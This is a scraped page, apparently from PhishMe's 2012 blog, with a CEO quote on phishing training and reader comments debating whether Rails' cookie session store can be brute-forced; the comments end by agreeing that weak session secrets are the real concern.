-
January 16"You'll see the typical security geek saying, 'People are dumb, people are stupid, they're never going to be trained,'." said Rohyt Belani, PhishMe co-founder and CEO. "We have statistics to prove otherwise."
 |
|
Home /
What is PhishMe /
Blog /
Who We Are /
News & Events /
Contact Us /
Sign Up /
Site Map
Company |
Stay in Touch |
|
|---|---|---|
©2012 PhishMe, Inc.
[...] See the “Part II” post for the BustRailsCookie script. Digg [...]
I'm sorry to report that you spread FUD at the OWASP conference.
Remove the rev query parameter from the link to the cookie store source, or simply checkout Rails trunk anytime since March 3 2007, and reconsider your claim.
I find this lack of diligence inexcusable when it's the basis for a talk at a security conference. Please consider correcting this and your earlier post.
There are legitimate concerns with the cookie store, but brute force attacks are not one of them.
Correction: the cracker itself does use the HMAC. All the other links are wrong. The concern regarding session secret strength is totally valid. See the discussion on the rails-core mailing list for more.
Here's a link to the rails-core mailing list where this topic is continued.
http://groups.google.com/group/rubyonrails-core/b…
To wrap up where things currently stand: Yes, the brute forcing of the cookie store hash is possible like this script demonstrates (so choose a strong password everyone!) And session replay is also possible (but there's probably ways to fix that.) We seem to be in disagreement that this should be the default session store choice.